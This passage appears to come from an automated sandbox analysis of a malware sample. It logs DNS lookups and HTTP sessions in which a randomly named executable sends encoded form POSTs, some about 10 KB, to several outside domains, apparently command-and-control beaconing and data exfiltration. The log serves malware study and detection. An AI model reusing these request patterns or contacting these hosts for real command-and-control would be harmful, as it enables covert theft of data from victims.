                                                                                                    Jan 22, 2025 07:53:05.571547985 CET8050027217.160.0.90192.168.2.4
                                                                                                    Jan 22, 2025 07:53:05.571576118 CET8050027217.160.0.90192.168.2.4
                                                                                                    Jan 22, 2025 07:53:05.571731091 CET8050027217.160.0.90192.168.2.4
                                                                                                    Jan 22, 2025 07:53:05.571758986 CET8050027217.160.0.90192.168.2.4
                                                                                                    Jan 22, 2025 07:53:05.571806908 CET8050027217.160.0.90192.168.2.4
                                                                                                    Jan 22, 2025 07:53:05.571834087 CET8050027217.160.0.90192.168.2.4
                                                                                                    Jan 22, 2025 07:53:06.216166019 CET8050027217.160.0.90192.168.2.4
                                                                                                    Jan 22, 2025 07:53:06.216216087 CET8050027217.160.0.90192.168.2.4
                                                                                                    Jan 22, 2025 07:53:06.216398954 CET5002780192.168.2.4217.160.0.90
                                                                                                    Jan 22, 2025 07:53:07.074729919 CET5002780192.168.2.4217.160.0.90
                                                                                                    Jan 22, 2025 07:53:08.093532085 CET5002880192.168.2.4217.160.0.90
                                                                                                    Jan 22, 2025 07:53:08.100174904 CET8050028217.160.0.90192.168.2.4
                                                                                                    Jan 22, 2025 07:53:08.100532055 CET5002880192.168.2.4217.160.0.90
                                                                                                    Jan 22, 2025 07:53:08.109710932 CET5002880192.168.2.4217.160.0.90
                                                                                                    Jan 22, 2025 07:53:08.116471052 CET8050028217.160.0.90192.168.2.4
                                                                                                    Jan 22, 2025 07:53:08.757775068 CET8050028217.160.0.90192.168.2.4
                                                                                                    Jan 22, 2025 07:53:08.757838964 CET8050028217.160.0.90192.168.2.4
                                                                                                    Jan 22, 2025 07:53:08.758131981 CET5002880192.168.2.4217.160.0.90
                                                                                                    Jan 22, 2025 07:53:08.760960102 CET5002880192.168.2.4217.160.0.90
                                                                                                    Jan 22, 2025 07:53:08.765827894 CET8050028217.160.0.90192.168.2.4

                                                                                                    UDP Packets

                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Jan 22, 2025 07:51:49.836574078 CET5500453192.168.2.41.1.1.1
                                                                                                    Jan 22, 2025 07:51:49.848660946 CET53550041.1.1.1192.168.2.4
                                                                                                    Jan 22, 2025 07:52:05.396671057 CET5164753192.168.2.41.1.1.1
                                                                                                    Jan 22, 2025 07:52:05.793525934 CET53516471.1.1.1192.168.2.4
                                                                                                    Jan 22, 2025 07:52:19.329217911 CET6131053192.168.2.41.1.1.1
                                                                                                    Jan 22, 2025 07:52:19.419101954 CET53613101.1.1.1192.168.2.4
                                                                                                    Jan 22, 2025 07:52:32.875545025 CET5192653192.168.2.41.1.1.1
                                                                                                    Jan 22, 2025 07:52:33.224605083 CET53519261.1.1.1192.168.2.4
                                                                                                    Jan 22, 2025 07:52:46.500677109 CET5543953192.168.2.41.1.1.1
                                                                                                    Jan 22, 2025 07:52:46.512696028 CET53554391.1.1.1192.168.2.4
                                                                                                    Jan 22, 2025 07:52:59.688662052 CET5481153192.168.2.41.1.1.1
                                                                                                    Jan 22, 2025 07:52:59.845375061 CET53548111.1.1.1192.168.2.4

                                                                                                    DNS Queries

                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                    Jan 22, 2025 07:51:49.836574078 CET192.168.2.41.1.1.10x7010Standard query (0)www.physicsbrain.xyzA (IP address)IN (0x0001)false
                                                                                                    Jan 22, 2025 07:52:05.396671057 CET192.168.2.41.1.1.10xe22cStandard query (0)www.bydotoparca.netA (IP address)IN (0x0001)false
                                                                                                    Jan 22, 2025 07:52:19.329217911 CET192.168.2.41.1.1.10x8578Standard query (0)www.car-select.onlineA (IP address)IN (0x0001)false
                                                                                                    Jan 22, 2025 07:52:32.875545025 CET192.168.2.41.1.1.10x5219Standard query (0)www.topked.topA (IP address)IN (0x0001)false
                                                                                                    Jan 22, 2025 07:52:46.500677109 CET192.168.2.41.1.1.10x7f10Standard query (0)www.autonomousrich.xyzA (IP address)IN (0x0001)false
                                                                                                    Jan 22, 2025 07:52:59.688662052 CET192.168.2.41.1.1.10xa39fStandard query (0)www.corellia.proA (IP address)IN (0x0001)false

                                                                                                    DNS Answers

                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                    Jan 22, 2025 07:51:49.848660946 CET1.1.1.1192.168.2.40x7010No error (0)www.physicsbrain.xyz13.248.169.48A (IP address)IN (0x0001)false
                                                                                                    Jan 22, 2025 07:51:49.848660946 CET1.1.1.1192.168.2.40x7010No error (0)www.physicsbrain.xyz76.223.54.146A (IP address)IN (0x0001)false
                                                                                                    Jan 22, 2025 07:52:05.793525934 CET1.1.1.1192.168.2.40xe22cNo error (0)www.bydotoparca.netredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Jan 22, 2025 07:52:05.793525934 CET1.1.1.1192.168.2.40xe22cNo error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Jan 22, 2025 07:52:05.793525934 CET1.1.1.1192.168.2.40xe22cNo error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                                                                    Jan 22, 2025 07:52:19.419101954 CET1.1.1.1192.168.2.40x8578No error (0)www.car-select.online31.31.196.17A (IP address)IN (0x0001)false
                                                                                                    Jan 22, 2025 07:52:33.224605083 CET1.1.1.1192.168.2.40x5219No error (0)www.topked.top192.64.118.221A (IP address)IN (0x0001)false
                                                                                                    Jan 22, 2025 07:52:46.512696028 CET1.1.1.1192.168.2.40x7f10No error (0)www.autonomousrich.xyz13.248.169.48A (IP address)IN (0x0001)false
                                                                                                    Jan 22, 2025 07:52:46.512696028 CET1.1.1.1192.168.2.40x7f10No error (0)www.autonomousrich.xyz76.223.54.146A (IP address)IN (0x0001)false
                                                                                                    Jan 22, 2025 07:52:59.845375061 CET1.1.1.1192.168.2.40xa39fNo error (0)www.corellia.pro217.160.0.90A (IP address)IN (0x0001)false

                                                                                                    HTTP Request Dependency Graph

                                                                                                    • www.physicsbrain.xyz
                                                                                                    • www.bydotoparca.net
                                                                                                    • www.car-select.online
                                                                                                    • www.topked.top
                                                                                                    • www.autonomousrich.xyz
                                                                                                    • www.corellia.pro

                                                                                                    HTTP Packets

                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    0192.168.2.44974213.248.169.48803484C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 22, 2025 07:51:49.870134115 CET406OUTGET /i9o2/?Gb=eeVMOLNT7Wv5dPd2abeY2s6wfV4z97Ojpf1j0+DhWbaaRP3NDl28Px2LHOiznaPSxG5Xa8rlCZjeYW1RU+5lmLpxfYJ7GpaXG0AU5Q2hJ+YZECeKnaUmPKw=&c8h40=q8sx8pUX60 HTTP/1.1
                                                                                                    Host: www.physicsbrain.xyz
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Language: en-US
                                                                                                    Connection: close
                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MASMJS)
                                                                                                    Jan 22, 2025 07:51:50.348340988 CET376INHTTP/1.1 200 OK
                                                                                                    content-type: text/html
                                                                                                    date: Wed, 22 Jan 2025 06:51:50 GMT
                                                                                                    content-length: 255
                                                                                                    connection: close
                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 47 62 3d 65 65 56 4d 4f 4c 4e 54 37 57 76 35 64 50 64 32 61 62 65 59 32 73 36 77 66 56 34 7a 39 37 4f 6a 70 66 31 6a 30 2b 44 68 57 62 61 61 52 50 33 4e 44 6c 32 38 50 78 32 4c 48 4f 69 7a 6e 61 50 53 78 47 35 58 61 38 72 6c 43 5a 6a 65 59 57 31 52 55 2b 35 6c 6d 4c 70 78 66 59 4a 37 47 70 61 58 47 30 41 55 35 51 32 68 4a 2b 59 5a 45 43 65 4b 6e 61 55 6d 50 4b 77 3d 26 63 38 68 34 30 3d 71 38 73 78 38 70 55 58 36 30 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Gb=eeVMOLNT7Wv5dPd2abeY2s6wfV4z97Ojpf1j0+DhWbaaRP3NDl28Px2LHOiznaPSxG5Xa8rlCZjeYW1RU+5lmLpxfYJ7GpaXG0AU5Q2hJ+YZECeKnaUmPKw=&c8h40=q8sx8pUX60"}</script></head></html>


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    1192.168.2.44981085.159.66.93803484C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 22, 2025 07:52:05.817666054 CET675OUTPOST /s3u9/ HTTP/1.1
                                                                                                    Host: www.bydotoparca.net
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US
                                                                                                    Origin: http://www.bydotoparca.net
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Content-Length: 199
                                                                                                    Connection: close
                                                                                                    Referer: http://www.bydotoparca.net/s3u9/
                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MASMJS)
                                                                                                    Data Raw: 47 62 3d 5a 78 4c 69 52 69 71 6e 65 39 4a 77 4b 35 57 2b 49 4a 4d 6d 46 46 6c 79 57 6a 49 45 79 68 36 64 53 57 2b 6c 35 72 51 6f 6a 48 76 62 64 50 2f 6a 6e 2f 57 59 75 72 2b 54 68 32 38 78 53 79 2b 67 76 67 6f 53 71 61 72 68 67 49 51 6a 42 55 79 35 42 6f 66 53 6e 39 6f 73 4a 35 36 52 49 2f 4f 4a 51 51 63 58 65 56 64 43 61 41 55 49 58 49 78 50 37 31 73 55 32 6e 37 62 4b 61 70 72 32 5a 44 30 30 6a 6c 6b 49 68 59 42 56 46 75 2f 68 54 52 34 79 57 75 42 73 38 35 59 50 34 6b 7a 34 52 50 41 6d 4a 48 56 74 36 78 6f 65 6c 32 56 41 32 30 56 61 67 57 61 36 36 32 66 74 6e 51 6e 44 77 38 37 6d 67 3d 3d
                                                                                                    Data Ascii: Gb=ZxLiRiqne9JwK5W+IJMmFFlyWjIEyh6dSW+l5rQojHvbdP/jn/WYur+Th28xSy+gvgoSqarhgIQjBUy5BofSn9osJ56RI/OJQQcXeVdCaAUIXIxP71sU2n7bKapr2ZD00jlkIhYBVFu/hTR4yWuBs85YP4kz4RPAmJHVt6xoel2VA20VagWa662ftnQnDw87mg==


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    2192.168.2.44982685.159.66.93803484C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 22, 2025 07:52:08.367629051 CET695OUTPOST /s3u9/ HTTP/1.1
                                                                                                    Host: www.bydotoparca.net
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US
                                                                                                    Origin: http://www.bydotoparca.net
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Content-Length: 219
                                                                                                    Connection: close
                                                                                                    Referer: http://www.bydotoparca.net/s3u9/
                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MASMJS)
                                                                                                    Data Raw: 47 62 3d 5a 78 4c 69 52 69 71 6e 65 39 4a 77 59 70 47 2b 48 4f 67 6d 51 31 6c 31 59 44 49 45 6c 78 36 5a 53 57 79 6c 35 71 55 34 6a 31 62 62 64 76 76 6a 6d 2b 57 59 70 72 2b 54 71 57 38 77 63 53 2b 72 76 67 30 61 71 61 6e 68 67 49 45 6a 42 56 69 35 42 37 33 4e 68 74 6f 75 45 5a 36 58 46 66 4f 4a 51 51 63 58 65 56 49 66 61 45 41 49 58 34 68 50 36 51 4d 58 74 48 37 63 4a 61 70 72 67 5a 44 4b 30 6a 6c 43 49 67 56 71 56 44 69 2f 68 52 5a 34 7a 44 61 43 6e 38 35 61 51 6f 6b 6c 70 79 53 7a 70 71 6d 6a 6c 36 74 75 59 6b 4f 79 42 77 35 50 4c 52 33 4e 6f 36 53 73 77 67 5a 54 4f 7a 42 79 39 74 38 2f 53 45 6b 58 6d 7a 2f 6d 6d 45 70 4b 53 34 7a 64 67 63 45 3d
                                                                                                    Data Ascii: Gb=ZxLiRiqne9JwYpG+HOgmQ1l1YDIElx6ZSWyl5qU4j1bbdvvjm+WYpr+TqW8wcS+rvg0aqanhgIEjBVi5B73NhtouEZ6XFfOJQQcXeVIfaEAIX4hP6QMXtH7cJaprgZDK0jlCIgVqVDi/hRZ4zDaCn85aQoklpySzpqmjl6tuYkOyBw5PLR3No6SswgZTOzBy9t8/SEkXmz/mmEpKS4zdgcE=


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    3192.168.2.44984285.159.66.93803484C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 22, 2025 07:52:10.911415100 CET10777OUTPOST /s3u9/ HTTP/1.1
                                                                                                    Host: www.bydotoparca.net
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US
                                                                                                    Origin: http://www.bydotoparca.net
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Content-Length: 10299
                                                                                                    Connection: close
                                                                                                    Referer: http://www.bydotoparca.net/s3u9/
                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MASMJS)
                                                                                                    Data Raw: 47 62 3d 5a 78 4c 69 52 69 71 6e 65 39 4a 77 59 70 47 2b 48 4f 67 6d 51 31 6c 31 59 44 49 45 6c 78 36 5a 53 57 79 6c 35 71 55 34 6a 31 44 62 63 63 58 6a 6e 64 4f 59 6f 72 2b 54 6a 32 38 74 63 53 2b 4d 76 67 38 65 71 61 62 78 67 4b 38 6a 42 33 36 35 56 61 33 4e 6f 74 6f 75 4e 35 36 57 49 2f 4f 6d 51 51 4d 54 65 56 59 66 61 45 41 49 58 36 70 50 39 46 73 58 71 33 37 62 4b 61 70 6e 32 5a 44 78 30 6a 63 35 49 67 41 52 56 7a 43 2f 69 79 78 34 2f 56 32 43 37 73 35 69 54 6f 6c 6d 70 79 65 73 70 71 4b 56 6c 35 78 49 59 6b 71 79 43 45 55 55 62 44 6d 62 77 5a 61 70 6c 78 4e 50 58 77 39 48 31 4b 6f 72 61 6b 59 37 2b 6a 43 4f 39 31 4a 41 49 70 71 62 7a 35 52 77 34 4c 65 75 2b 78 4f 58 4d 4b 77 7a 38 51 43 49 59 75 39 45 32 6e 32 4c 33 34 6c 66 67 4a 52 78 5a 4b 74 71 4b 31 54 30 57 46 77 79 76 50 56 57 58 4a 6d 5a 61 67 46 56 67 6b 56 6b 54 73 73 76 47 31 59 30 45 48 35 35 5a 5a 57 30 49 2b 47 68 50 42 4c 72 74 36 78 4a 34 58 50 45 46 4d 7a 79 65 79 41 36 66 46 48 6d 70 72 64 4c 4e 4b 44 71 2f 4d 6e 6b 66 49 63 [TRUNCATED]
                                                                                                    Data Ascii: Gb=ZxLiRiqne9JwYpG+HOgmQ1l1YDIElx6ZSWyl5qU4j1DbccXjndOYor+Tj28tcS+Mvg8eqabxgK8jB365Va3NotouN56WI/OmQQMTeVYfaEAIX6pP9FsXq37bKapn2ZDx0jc5IgARVzC/iyx4/V2C7s5iTolmpyespqKVl5xIYkqyCEUUbDmbwZaplxNPXw9H1KorakY7+jCO91JAIpqbz5Rw4Leu+xOXMKwz8QCIYu9E2n2L34lfgJRxZKtqK1T0WFwyvPVWXJmZagFVgkVkTssvG1Y0EH55ZZW0I+GhPBLrt6xJ4XPEFMzyeyA6fFHmprdLNKDq/MnkfIcBeV6MlJ488UtmFI5UdB9yKoy7+3pfskNQc+uKl43KIaeXm5UOYv4D1ZsjpKlutJV9IiBzr8NU0Gm1DjApc915/9sTksL/MAZYABeDw6tc7JUnXSRIsWEHkoh7p86nfGqR5UkDm7aVv2x1nEgHdBmuB5uY93P3usxYZOB7GyeRQ2LTqsFgh7URDeUeAhV38/ozlvxAQ5lH+JvLeqN9Lbv9r2JKbAIQTM0Y+fL/FqBDbz1ONPmsq1Xl0QU535bMcPGXS95AE7ZbY46eBGP5wlqG/TDaPrjGmrSSULCENsl/lepR6mEHaMV9EktA1YBEf5AxcBwRUySWwfW0ADdbvwGgEXUKWm/Kw4FKunZZqJ1iFgwXnncnyq2L2IBQ4dcqR9EgU7JUq5Zndqhbeq3qAzjptq2aIcPzFG8dNh8z2Zd5ifgp3w9qHbQ+YME4vTdhu8HgUGGpSnVd5Sv/nvcA2y/Z9L59NR6yzjqqCTfWz6e6HQX9EHzMvZi/9K3yZUVcxZurX3+B2wGn6mIy3OghYD6ouJKBKy+Q0h3KJkF/stGfjoT/K19o+vok5vK3mZ6YsKlfa1uk168Sk+S4ZBQb8mZG465vZ5cmj6WKX7UJh0LsPAk891gSsjHCpd4dcAtq7qugKPHKfIfT36aItQXDLzCZAG2R4FIa4WrJG [TRUNCATED]


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    4192.168.2.44985985.159.66.93803484C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 22, 2025 07:52:13.648128986 CET405OUTGET /s3u9/?Gb=UzjCSVSddvdCY8C1FJhZD3hzV3cx7V6VeHfhkJM3nHWcSpz3gZ2Mu5mgzC51fDOgl0cc0ISzjbohHF66d8TEsNQ+DIbND6ryFzsAfnoTIAADRp566kYszBo=&c8h40=q8sx8pUX60 HTTP/1.1
                                                                                                    Host: www.bydotoparca.net
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Language: en-US
                                                                                                    Connection: close
                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MASMJS)
                                                                                                    Jan 22, 2025 07:52:14.309233904 CET225INHTTP/1.1 404 Not Found
                                                                                                    Server: nginx/1.14.1
                                                                                                    Date: Wed, 22 Jan 2025 06:52:14 GMT
                                                                                                    Content-Length: 0
                                                                                                    Connection: close
                                                                                                    X-Rate-Limit-Limit: 5s
                                                                                                    X-Rate-Limit-Remaining: 19
                                                                                                    X-Rate-Limit-Reset: 2025-01-22T06:52:19.1841485Z


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    5192.168.2.44989931.31.196.17803484C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 22, 2025 07:52:19.440969944 CET681OUTPOST /sps0/ HTTP/1.1
                                                                                                    Host: www.car-select.online
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US
                                                                                                    Origin: http://www.car-select.online
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Content-Length: 199
                                                                                                    Connection: close
                                                                                                    Referer: http://www.car-select.online/sps0/
                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MASMJS)
                                                                                                    Data Raw: 47 62 3d 61 4c 44 4b 58 2f 63 77 38 57 79 4c 56 31 65 76 72 64 6c 42 41 58 79 62 55 53 76 70 42 6e 73 30 5a 59 6a 55 54 6d 73 4b 63 71 5a 4d 39 61 73 51 4f 7a 53 78 77 6d 53 67 55 55 36 61 76 2b 44 4e 76 41 75 45 34 52 4a 6e 6b 6c 31 6b 4d 34 65 44 48 79 4d 4c 48 6c 49 6d 51 6c 32 7a 5a 2f 61 4f 61 44 37 77 72 65 48 38 32 57 50 51 71 76 79 31 72 57 32 39 4b 2b 52 4e 5a 45 66 66 5a 4b 2f 68 4f 58 39 70 4e 2b 62 36 4d 2f 4c 34 6d 66 78 4d 5a 2b 36 51 39 42 37 6a 6a 64 53 54 35 4b 47 4d 69 41 61 4a 65 5a 34 57 6a 48 70 33 78 31 4c 53 73 71 59 2f 30 56 30 51 54 6e 33 75 7a 74 42 4f 70 77 3d 3d
                                                                                                    Data Ascii: Gb=aLDKX/cw8WyLV1evrdlBAXybUSvpBns0ZYjUTmsKcqZM9asQOzSxwmSgUU6av+DNvAuE4RJnkl1kM4eDHyMLHlImQl2zZ/aOaD7wreH82WPQqvy1rW29K+RNZEffZK/hOX9pN+b6M/L4mfxMZ+6Q9B7jjdST5KGMiAaJeZ4WjHp3x1LSsqY/0V0QTn3uztBOpw==
                                                                                                    Jan 22, 2025 07:52:20.184201956 CET375INHTTP/1.1 404 Not Found
                                                                                                    Server: nginx
                                                                                                    Date: Wed, 22 Jan 2025 06:52:20 GMT
                                                                                                    Content-Type: text/html
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Vary: Accept-Encoding
                                                                                                    Content-Encoding: gzip
                                                                                                    Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    6192.168.2.44991631.31.196.17803484C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 22, 2025 07:52:21.988538980 CET701OUTPOST /sps0/ HTTP/1.1
                                                                                                    Host: www.car-select.online
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US
                                                                                                    Origin: http://www.car-select.online
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Content-Length: 219
                                                                                                    Connection: close
                                                                                                    Referer: http://www.car-select.online/sps0/
                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MASMJS)
                                                                                                    Data Raw: 47 62 3d 61 4c 44 4b 58 2f 63 77 38 57 79 4c 55 56 75 76 70 2b 4e 42 55 48 79 55 4e 69 76 70 55 33 73 77 5a 59 2f 55 54 6e 6f 61 63 34 39 4d 2b 2f 6f 51 50 32 79 78 35 32 53 67 41 45 36 66 79 4f 44 53 76 41 6a 7a 34 51 31 6e 6b 6c 78 6b 4d 38 4f 44 41 42 30 49 49 56 49 6b 57 6c 32 78 58 66 61 4f 61 44 37 77 72 65 54 57 32 58 72 51 71 64 6d 31 74 33 32 36 48 65 52 4d 4e 55 66 66 64 4b 2f 74 4f 58 38 54 4e 38 2f 63 4d 39 7a 34 6d 64 70 4d 5a 76 36 54 75 68 37 6c 75 39 54 5a 31 62 36 41 67 51 69 42 61 59 30 53 67 6b 5a 6d 35 54 47 49 39 62 35 6f 6d 56 51 6a 4f 67 2b 61 2b 75 38 48 79 35 65 6c 4f 6d 66 45 4f 4f 6b 68 72 78 4b 57 4c 49 33 73 43 77 34 3d
                                                                                                    Data Ascii: Gb=aLDKX/cw8WyLUVuvp+NBUHyUNivpU3swZY/UTnoac49M+/oQP2yx52SgAE6fyODSvAjz4Q1nklxkM8ODAB0IIVIkWl2xXfaOaD7wreTW2XrQqdm1t326HeRMNUffdK/tOX8TN8/cM9z4mdpMZv6Tuh7lu9TZ1b6AgQiBaY0SgkZm5TGI9b5omVQjOg+a+u8Hy5elOmfEOOkhrxKWLI3sCw4=
                                                                                                    Jan 22, 2025 07:52:22.681849003 CET375INHTTP/1.1 404 Not Found
                                                                                                    Server: nginx
                                                                                                    Date: Wed, 22 Jan 2025 06:52:22 GMT
                                                                                                    Content-Type: text/html
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Vary: Accept-Encoding
                                                                                                    Content-Encoding: gzip
                                                                                                    Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    7192.168.2.44993431.31.196.17803484C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 22, 2025 07:52:24.535631895 CET10783OUTPOST /sps0/ HTTP/1.1
                                                                                                    Host: www.car-select.online
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US
                                                                                                    Origin: http://www.car-select.online
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Content-Length: 10299
                                                                                                    Connection: close
                                                                                                    Referer: http://www.car-select.online/sps0/
                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MASMJS)
